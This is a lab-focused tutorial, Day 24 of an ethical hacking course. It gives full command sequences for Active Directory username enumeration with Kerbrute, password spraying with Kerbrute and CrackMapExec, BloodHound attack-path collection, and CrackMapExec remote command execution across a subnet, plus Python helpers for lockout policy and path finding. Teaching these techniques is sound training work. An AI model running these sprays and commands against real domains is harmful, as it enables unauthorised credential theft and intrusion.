Day 24 : Active Directory Attacks 2026 — Enumeration, Password Spraying & Initial Foothold

Part of the 100-Day Free Ethical Hacking Course — from complete beginner to professional penetration tester

Day 24 of 100 · 24% complete

Yesterday we built the foundation — understanding the AD structure, Kerberos flow, and setting up the lab. Today we start attacking. Active Directory attacks begin not with exploits but with enumeration: finding every user, every group, every misconfigured permission, and every attack path before touching anything. The tools on Day 24 — Kerbrute, CrackMapExec, BloodHound — are what professional red teamers use to map the entire domain from a single low-privileged foothold. By the end of today you will have your first active directory attacks methodology working in your lab.

🎯 What You’ll Master in Day 24

Enumerate domain users without credentials using Kerbrute Kerberos username enumeration
Query the password policy to plan a safe spray that stays below lockout thresholds
Execute a controlled password spray using CrackMapExec and Kerbrute
Run BloodHound/bloodhound-python to map the full attack path to Domain Admin
Identify the shortest path from your foothold to DA and prioritise next steps

⏱️ 28 min read · 3 hands-on exercises


✅ This guide works for all levels. If you haven’t set up the lab yet, complete Day 23 first — all exercises require the lab.local domain controller.

On Day 23 we built the AD lab and understood the forest/domain/OU hierarchy, Kerberos authentication, and the AD attack surface. Today we act on that knowledge. Every technique in this guide follows the professional principle: enumerate completely before you exploit anything. The goal on Day 24 is to go from zero domain knowledge to a complete attack path map without locking out a single account and, if we execute cleanly, without triggering a single alert.

This is Day 24 of the 100-Day Free Ethical Hacking Course. The next five days build directly on today’s enumeration work — Day 25 uses the usernames and SPN data gathered today for Kerberoasting and AS-REP Roasting attacks.


The AD Attack Methodology — Enumerate Before You Exploit

Professional AD penetration testing follows a strict methodology: never exploit before you enumerate. This is not caution — it is efficiency. Blind exploitation wastes time and risks lockouts. Thorough enumeration tells you exactly which user to spray, which service account to Kerberoast, and which path to Domain Admin is fastest. The five-step AD attack chain from Day 23 maps directly to the tools we cover today.

Day 24 — AD Attack Phase Map
1. Unauthenticated Enumeration — Kerbrute username discovery · DNS queries · Anonymous LDAP · Password policy query
2. Credential Acquisition — Password spray · AS-REP Roasting (no auth needed) · LLMNR poisoning
3. Authenticated Enumeration — BloodHound · CrackMapExec · PowerView · Kerberoastable SPN enumeration
4. Privilege Escalation — Kerberoasting · Pass the Hash · ACL abuse · BloodHound path exploitation
5. Domain Compromise — DCSync · Golden Ticket · Persistence via krbtgt hash

📍 Today we cover steps 1–3. Days 25–27 cover steps 4–5.

📸 AD attack phase map for Days 24–31 — today covers unauthenticated enumeration through authenticated BloodHound mapping. Each phase feeds directly into the next.

🧠 EXERCISE 1 — THINK LIKE A HACKER (2 MIN)
Why is enumerating the password policy the most critical first step before spraying?

⏱️ Time: 2 minutes · No tools required

Consider this scenario: you have a list of 200 domain usernames. You want to spray the password “Password123!” against all of them. Before running a single command, answer these questions:

Domain policy (unknown to you): lockoutThreshold=3, observationWindow=30min

If you spray three wrong passwords against all 200 users, every one of the 200 accounts is locked out.

Questions to answer before spraying:
1. What command gives you the lockout threshold safely?
2. How many passwords can you safely spray in one window?
3. What do you do if the policy shows lockoutThreshold=0 (no lockout)?
4. How long do you wait between spray rounds?
5. What happens to the organisation if you lock out 200 accounts?

✅ What you just learned: Password spraying without checking the policy first is one of the most destructive mistakes a penetration tester can make. Locking out hundreds of accounts causes immediate operational disruption, alerts the blue team, and invalidates the engagement. Policy-first spraying is a professional discipline, not optional caution. No spray without policy check.

📸 Write your answers to all 5 questions and share in #day24-methodology on Discord.


Kerbrute — Username Enumeration Without Triggering Lockouts

Kerbrute is a Go-based tool that uses the Kerberos pre-authentication mechanism to test whether usernames exist in a domain — without requiring any credentials and, crucially, without generating failed login events in Windows Security Event logs. This makes it the preferred tool for username enumeration during the unauthenticated phase of an AD assessment.

The technique works because of a subtle difference in how the Kerberos KDC responds to AS-REQ messages for valid versus invalid usernames. For a valid username, the KDC responds with a TGT or a request for pre-authentication credentials. For an invalid username, it responds with PRINCIPAL_UNKNOWN — a different error code. Kerbrute reads these responses and maps them to valid/invalid without ever providing a password.

KERBRUTE — INSTALLATION AND USER ENUMERATION
# Install Kerbrute on Kali Linux: try the package first, otherwise fetch the
# release binary (writing to /usr/local/bin needs root, hence sudo on both steps)
sudo apt install -y kerbrute 2>/dev/null || {
sudo wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /usr/local/bin/kerbrute && \
sudo chmod +x /usr/local/bin/kerbrute
}

# Create a test username list for your lab
cat > /tmp/lab-users.txt << 'EOF'
administrator
asmith
bjones
sqlsvc
jdoe
fakeuser
notreal
EOF

# Run username enumeration against your lab DC
kerbrute userenum \
--dc 192.168.56.10 \
-d lab.local \
/tmp/lab-users.txt
# Valid users will show: [+] VALID USERNAME: asmith@lab.local
# Invalid users: no output (Kerbrute prints only hits unless run with -v)

# Use a real-world username wordlist for actual engagements
kerbrute userenum --dc 192.168.56.10 -d lab.local \
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
-o /tmp/valid-users.txt
# -o writes the log (the valid usernames) to a file for use in the next phases

💡 Why Kerbrute Over Other Methods: Traditional username enumeration via SMB or LDAP creates Windows Security Event ID 4625 (failed logon) for each attempt. Kerbrute’s Kerberos method typically does not generate these events, making enumeration significantly less visible to a monitoring SOC. Some modern AD configurations do log Kerberos pre-auth failures (Event ID 4771), so always verify with your client whether SIEM monitoring is active.

🧠 QUICK CHECK — Section 2

Why does Kerbrute username enumeration avoid triggering standard failed-login alerts?




Password Policy — The Information That Keeps Your Spray Safe

Before running a single password against a domain account, you must know the lockout policy. This is non-negotiable. The three values you need are: lockout threshold (number of failed attempts before lockout), lockout duration (how long the account stays locked), and observation window (the time window in which failed attempts are counted).

QUERY PASSWORD POLICY — MULTIPLE METHODS
# METHOD 1 — CrackMapExec (anonymous/null session or with credentials)
crackmapexec smb 192.168.56.10 -u '' -p '' --pass-pol
crackmapexec smb 192.168.56.10 -u 'asmith' -p 'Password123!' --pass-pol

# METHOD 2 — enum4linux
enum4linux -P 192.168.56.10

# METHOD 3 — LDAP query (with credentials; -x selects a simple bind)
ldapsearch -x -H ldap://192.168.56.10 -D 'LAB\asmith' -w 'Password123!' \
-b 'DC=lab,DC=local' '(objectClass=domainDNS)' \
lockoutThreshold lockoutDuration lockoutObservationWindow minPwdLength
# lockoutDuration and lockoutObservationWindow are returned as negative counts
# of 100-nanosecond intervals: -18000000000 is 30 minutes

# INTERPRET THE RESULTS:
lockoutThreshold = 5 → max 3 passwords per observation window (threshold - 2)
lockoutThreshold = 0 → NO lockout — spray freely but note detection risk
observationWindow = 30min → wait 30 min between spray rounds
lockoutDuration = 30min → accounts auto-unlock after 30 min
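An added example, not part of the course material, that turns Method 3's ldapsearch output into the numbers above. The sample LDIF is constructed; the code handles the two details that catch people out: AD returns lockoutDuration and lockoutObservationWindow as negative counts of 100-nanosecond intervals, and a duration of -2^63 means the account stays locked until an administrator unlocks it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# AD stores lockoutDuration and lockoutObservationWindow as negative counts of
# 100-nanosecond intervals; 600,000,000 of them make one minute.
TICKS_PER_MINUTE = 600_000_000
NEVER_EXPIRES = -(2 ** 63)   # Int64 minimum: locked until an admin unlocks

# Constructed sample of what Method 3 (ldapsearch) returns for the lab domain.
SAMPLE_LDIF = """dn: DC=lab,DC=local
lockoutThreshold: 5
lockoutDuration: -18000000000
lockoutObservationWindow: -18000000000
minPwdLength: 7
"""

@dataclass
class LockoutPolicy:
    threshold: int                # failed attempts before lockout; 0 = never
    window_min: int               # observation window, minutes
    duration_min: Optional[int]   # minutes locked; None = until admin unlock
    min_pwd_length: int

def parse_ldif_policy(ldif: str) -> LockoutPolicy:
    """Pull the four attributes out of LDIF 'attr: value' lines."""
    attrs = {}
    for line in ldif.splitlines():
        m = re.match(r"^(\w+):\s*(-?\d+)\s*$", line)
        if m:
            attrs[m.group(1)] = int(m.group(2))
    duration = attrs.get("lockoutDuration", 0)
    return LockoutPolicy(
        threshold=attrs.get("lockoutThreshold", 0),
        window_min=abs(attrs.get("lockoutObservationWindow", 0)) // TICKS_PER_MINUTE,
        duration_min=None if duration == NEVER_EXPIRES else abs(duration) // TICKS_PER_MINUTE,
        min_pwd_length=attrs.get("minPwdLength", 0),
    )

def spray_budget(policy: LockoutPolicy) -> dict:
    """Apply the course rule: at most (threshold - 2) passwords per observation
    window and a full-window wait between rounds. threshold 0 means the domain
    never locks accounts, so the budget is unbounded (None) and the remaining
    risk is detection rather than lockout."""
    if policy.threshold == 0:
        return {"locks_accounts": False, "passwords_per_window": None, "wait_minutes": 0}
    return {
        "locks_accounts": True,
        "passwords_per_window": max(policy.threshold - 2, 0),   # 0 = do not spray
        "wait_minutes": policy.window_min,
    }

if __name__ == "__main__":
    pol = parse_ldif_policy(SAMPLE_LDIF)
    print(pol)
    print(spray_budget(pol))
```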


Password Spraying — One Password, Many Targets

Password spraying tests a single common password against all discovered usernames simultaneously. It is effective because organisations consistently have users who choose predictable passwords — seasonal passwords, company name + year combinations, or the organisation’s default password. The art is choosing the right password to spray and executing within the safe threshold.

PASSWORD SPRAY — KERBRUTE AND CRACKMAPEXEC
# METHOD 1 — Kerbrute password spray (low visibility)
kerbrute passwordspray \
-d lab.local \
--dc 192.168.56.10 \
/tmp/valid-users.txt \
'Password123!'
# Success: [+] VALID LOGIN: bjones@lab.local:Password123!

# METHOD 2 — CrackMapExec spray (more verbose output)
crackmapexec smb 192.168.56.10 \
-u /tmp/valid-users.txt \
-p 'Password123!' \
--continue-on-success
# [+] lab.local\bjones:Password123! (Pwn3d! if local admin)

# SAFE SPRAY RULES:
1. Always query policy first (--pass-pol)
2. Spray max (lockoutThreshold - 2) passwords per window
3. Wait the full observationWindow between rounds
4. Use --continue-on-success to collect all valid credentials
5. Document every spray round with timestamp in your notes

# COMMON LAB SPRAY PASSWORDS TO TEST:
for PASS in 'Password123!' 'Winter2026!' 'Lab@12345' 'Welcome1'; do
echo "[*] Spraying: $PASS"
crackmapexec smb 192.168.56.10 -u /tmp/valid-users.txt -p "$PASS" --continue-on-success 2>/dev/null | grep '\[+\]'
sleep 5
done
# Only use this loop if lockoutThreshold=0 (no lockout) in your lab

⚠️ Critical Rule — Never Exceed Threshold – 2: If lockoutThreshold = 5, spray a maximum of 3 different passwords before waiting the full observation window. Going to 4 or 5 failures risks locking accounts if any prior failed attempts exist in the window. In your lab, set a zero-lockout policy during training so you can practise freely without consequences.

BloodHound — Mapping the Path to Domain Admin

BloodHound is a graphical attack path analysis tool that transforms raw Active Directory data into a map showing exactly which paths lead from your current access to Domain Admin. Once you have one set of valid credentials — even from a low-privileged user — BloodHound can identify the fastest attack path through ACL relationships, group memberships, and session data that would take days to find manually.

🧪 EXERCISE 2 — FREE ONLINE LAB (TryHackMe)
Complete the TryHackMe BloodHound room to practise attack path analysis

⏱️ Time: 30 minutes · Target: TryHackMe BloodHound room (authorised platform)

If you are waiting for your AD lab to be fully configured, use TryHackMe’s free BloodHound room to practise attack path analysis with a pre-built AD environment.

Target: tryhackme.com/room/bloodhound

Steps:
1. Deploy the room machine and connect via TryHackMe OpenVPN
2. Follow the room tasks to run SharpHound and collect AD data
3. Import the JSON files into BloodHound
4. Run the pre-built query: “Find Shortest Paths to Domain Admins”
5. Identify the attack path shown in the graph
6. Answer: what intermediate objects appear in the path?

✅ What you just learned: BloodHound makes complex AD attack paths instantly visible. A path that would require days of manual LDAP querying to discover appears as a clickable graph in seconds. The pre-built queries — especially “Find Shortest Paths to Domain Admins” — are what professional red teamers run within the first ten minutes of getting a foothold on a domain.

📸 Screenshot your BloodHound graph showing the attack path and share in #day24-bloodhound on Discord.

BLOODHOUND — DATA COLLECTION AND ANALYSIS
# Install bloodhound-python (Kali Linux); the pip line is the fallback if the apt package is unavailable
sudo apt install -y bloodhound python3-bloodhound || \
pip3 install bloodhound --break-system-packages

# Collect AD data using bloodhound-python (from Kali, no Windows agent needed)
# Add -ns 192.168.56.10 if Kali does not already use the DC as its DNS server
bloodhound-python \
-d lab.local \
-u asmith \
-p 'Password123!' \
-dc dc01.lab.local \
-c All \
--zip
# Creates: 20260406_BloodHound.zip with JSON files

# Start Neo4j database and BloodHound GUI
sudo neo4j start
bloodhound &
# Login: neo4j / neo4j (change on first login)
# Upload: drag and drop the .zip file into BloodHound

# KEY BLOODHOUND QUERIES TO RUN:
Find Shortest Paths to Domain Admins
Find All Domain Admins
List All Kerberoastable Accounts
Find Principals with DCSync Rights
Find Computers Where Domain Users are Local Admin
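To make concrete what “Find Shortest Paths to Domain Admins” computes, and how to read the result defensively, here is an added example (not BloodHound’s code; the graph is constructed) that runs breadth-first search over edges in BloodHound’s own vocabulary and then counts how many principals’ shortest paths share each edge.

```python
from collections import Counter, defaultdict, deque

# Constructed lab graph as (source, edge, target) using BloodHound edge names
# and its NAME@DOMAIN / HOST.DOMAIN node naming.
EDGES = [
    ("ASMITH@LAB.LOCAL", "MemberOf", "HELPDESK@LAB.LOCAL"),
    ("CMILLER@LAB.LOCAL", "MemberOf", "HELPDESK@LAB.LOCAL"),
    ("HELPDESK@LAB.LOCAL", "GenericAll", "SVC_BACKUP@LAB.LOCAL"),   # the ACL nobody knew about
    ("SVC_BACKUP@LAB.LOCAL", "AdminTo", "FS01.LAB.LOCAL"),
    ("FS01.LAB.LOCAL", "HasSession", "JDOE@LAB.LOCAL"),
    ("JDOE@LAB.LOCAL", "MemberOf", "DOMAIN ADMINS@LAB.LOCAL"),
    ("BJONES@LAB.LOCAL", "MemberOf", "DOMAIN USERS@LAB.LOCAL"),
    ("DOMAIN USERS@LAB.LOCAL", "CanRDP", "WS02.LAB.LOCAL"),
]
DA = "DOMAIN ADMINS@LAB.LOCAL"

def shortest_path(edges, start, goal):
    """Breadth-first search; returns the hop list [(src, edge, dst), ...] or
    None. This is what the pre-built query computes for each start node."""
    adj = defaultdict(list)
    for src, rel, dst in edges:
        adj[src].append((rel, dst))
    prev = {start: None}          # node -> (previous node, edge taken)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while prev[node] is not None:
                src, rel = prev[node]
                path.append((src, rel, node))
                node = src
            return path[::-1]
        for rel, nxt in adj[node]:
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None

def edge_pressure(edges, starts, goal) -> Counter:
    """How many principals' shortest paths cross each edge. Edges shared by
    many paths are where one fix (e.g. removing an ACE) cuts several paths."""
    pressure = Counter()
    for start in starts:
        path = shortest_path(edges, start, goal)
        if path:
            pressure.update(path)
    return pressure

if __name__ == "__main__":
    for src, rel, dst in shortest_path(EDGES, "ASMITH@LAB.LOCAL", DA) or []:
        print(f"{src} -[{rel}]-> {dst}")
    users = ["ASMITH@LAB.LOCAL", "CMILLER@LAB.LOCAL", "BJONES@LAB.LOCAL", "JDOE@LAB.LOCAL"]
    print(edge_pressure(EDGES, users, DA).most_common(3))
```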


CrackMapExec — Swiss Army Knife for AD Enumeration

CrackMapExec (CME) is the single most versatile tool for authenticated AD enumeration. Once you have one valid credential — even from a low-privileged domain user — CME can enumerate users, groups, shares, logged-in sessions, and local administrator access across every machine in the domain simultaneously. Think of it as “what can I reach with this credential right now?”

CRACKMAPEXEC — AUTHENTICATED ENUMERATION COMMANDS
# Verify credentials and check for local admin (Pwn3d!)
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!'
# Pwn3d! = local admin on this machine

# Enumerate all domain users
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!' --users

# Enumerate all groups
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!' --groups

# Enumerate open shares
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!' --shares

# Check who is logged in on every machine in the domain
crackmapexec smb 192.168.56.0/24 -u asmith -p 'Password123!' --sessions
# A Domain Admin session on any machine = your next lateral movement target

# Check local admin access across all machines (subnet scan)
crackmapexec smb 192.168.56.0/24 -u asmith -p 'Password123!' 2>/dev/null | grep "Pwn3d"

# Enumerate computers in domain
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!' --computers

# Run a command on all machines where you are local admin
crackmapexec smb 192.168.56.0/24 -u asmith -p 'Password123!' -x 'whoami'

🔥 EXERCISE 3 — KALI LINUX TERMINAL (AD LAB)
Full enumeration sequence — from username discovery to BloodHound collection

⏱️ Time: 25 minutes · Target: Your lab.local DC at 192.168.56.10

Run the complete Day 24 enumeration workflow from scratch. By the end you will have a user list, password policy, a valid credential from the spray, and BloodHound data imported and ready.

COMPLETE DAY 24 WORKFLOW
# Step 1 — Enumerate users with Kerbrute
kerbrute userenum --dc 192.168.56.10 -d lab.local /tmp/lab-users.txt -o /tmp/valid-users.txt
cat /tmp/valid-users.txt

# Step 2 — Query password policy
crackmapexec smb 192.168.56.10 -u '' -p '' --pass-pol 2>/dev/null
# Note the lockoutThreshold value before proceeding

# Step 3 — Spray (lab has no lockout — safe to try multiple)
kerbrute passwordspray -d lab.local --dc 192.168.56.10 /tmp/valid-users.txt 'Password123!'

# Step 4 — Verify credential with CrackMapExec
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!'
crackmapexec smb 192.168.56.10 -u asmith -p 'Password123!' --users 2>/dev/null | head -20

# Step 5 — Collect BloodHound data
bloodhound-python -d lab.local -u asmith -p 'Password123!' -dc dc01.lab.local -c All --zip 2>/dev/null
ls *.zip
# Start BloodHound, import the zip, run "Find Shortest Paths to Domain Admins"

✅ What you just learned: In five steps you went from zero domain knowledge to a complete BloodHound attack map ready for Days 25–27. This is the exact workflow used on the first day of a real AD penetration test. The path BloodHound shows you is what you will exploit over the next four days — Kerberoasting, Pass the Hash, and lateral movement.

📸 Screenshot your BloodHound “Shortest Paths to Domain Admins” graph and share in #day24-exercise on Discord. Tag #adattacks2026

🧠 QUICK CHECK — Day 24 Final

What is the primary value of BloodHound over manual LDAP queries for AD attack path discovery?




📋 Commands Used Today — Day 24 Reference

kerbrute userenum --dc DC -d DOMAIN users.txt — Enumerate valid AD usernames via Kerberos
crackmapexec smb DC -u '' -p '' --pass-pol — Query domain password policy (anonymous)
kerbrute passwordspray -d DOMAIN --dc DC users.txt 'Password' — Spray one password against all users
crackmapexec smb DC -u USER -p PASS --users — Enumerate all domain users with a valid credential
crackmapexec smb SUBNET -u USER -p PASS --sessions — Find where privileged users are logged in
bloodhound-python -d DOMAIN -u USER -p PASS -dc DC -c All --zip — Collect all AD data for BloodHound analysis

🏆 Mark Day 24 as Complete

Enumeration complete — attack path mapped. Day 25 exploits it.


❓ Frequently Asked Questions

What is password spraying in Active Directory?
Password spraying tests a single common password against many user accounts, avoiding lockout by keeping each account’s failed attempt count to one. It works because organisations consistently have users with predictable passwords. Always query the password policy first to determine the safe spray threshold before executing.
What is BloodHound used for in AD attacks?
BloodHound collects Active Directory relationship data (users, groups, ACLs, sessions, trust relationships) using SharpHound or bloodhound-python, then visualises attack paths from any starting point to Domain Admin. It answers the critical question: given this foothold, what is the fastest path to DA?
What is Kerbrute and why use it over other enumeration tools?
Kerbrute enumerates valid domain usernames via Kerberos pre-authentication without providing passwords and typically without generating Windows Security Event 4625 (failed login) entries. This makes it significantly less visible to a monitoring SOC than SMB-based username enumeration methods.
How many passwords can I safely spray?
Always query the policy first. Spray a maximum of lockoutThreshold – 2 different passwords within one observation window. If threshold=5, spray max 3. Wait the full observation window between rounds. In your lab environment, set lockoutThreshold=0 to practise without consequences — but understand that on real engagements, locking out accounts causes operational disruption.
What comes after Day 24 in the AD attack series?
Day 25 covers Kerberos attacks — AS-REP Roasting (finding accounts without pre-auth required, requestable without credentials) and Kerberoasting (requesting service tickets for SPN accounts, cracking them offline). Both attacks use the user data and SPN enumeration from today’s BloodHound collection.


📚 Further Reading

  • Day 23: Active Directory Basics — The prerequisite — AD forest structure, Kerberos flow, and lab setup that all of today’s techniques build directly upon.
  • Ethical Hacking: Enumeration Hub — The complete enumeration category covering LDAP, SMB, Kerberos, RPC, and DNS enumeration techniques used across AD and non-AD environments.
  • Ethical Hacking: Exploitation Hub — Where the data gathered today leads — exploitation techniques including Kerberoasting, Pass the Hash, and lateral movement covered in Days 25–30.
  • MITRE ATT&CK: Password Spraying (T1110.003) — MITRE’s complete technical reference for password spraying — detection methods, mitigations, and real-world threat actor usage patterns.
  • BloodHound Official Documentation — Complete reference for BloodHound queries, data collection methods, custom query writing, and attack path interpretation.

Mr Elite
Owner, SecurityElites.com
The first time I ran BloodHound on a real corporate AD environment, I found a path from the helpdesk account I had compromised to Domain Admin in four hops — via an obscure ACL relationship that the client’s IT team had no idea existed. It had been in place for three years. That experience changed how I think about AD security fundamentally: complexity is the enemy of security, and BloodHound makes the invisible visible. Teaching Day 24 properly — the enumeration-first discipline — is the foundation that makes everything from Day 25 onwards possible without unnecessary noise or collateral damage.
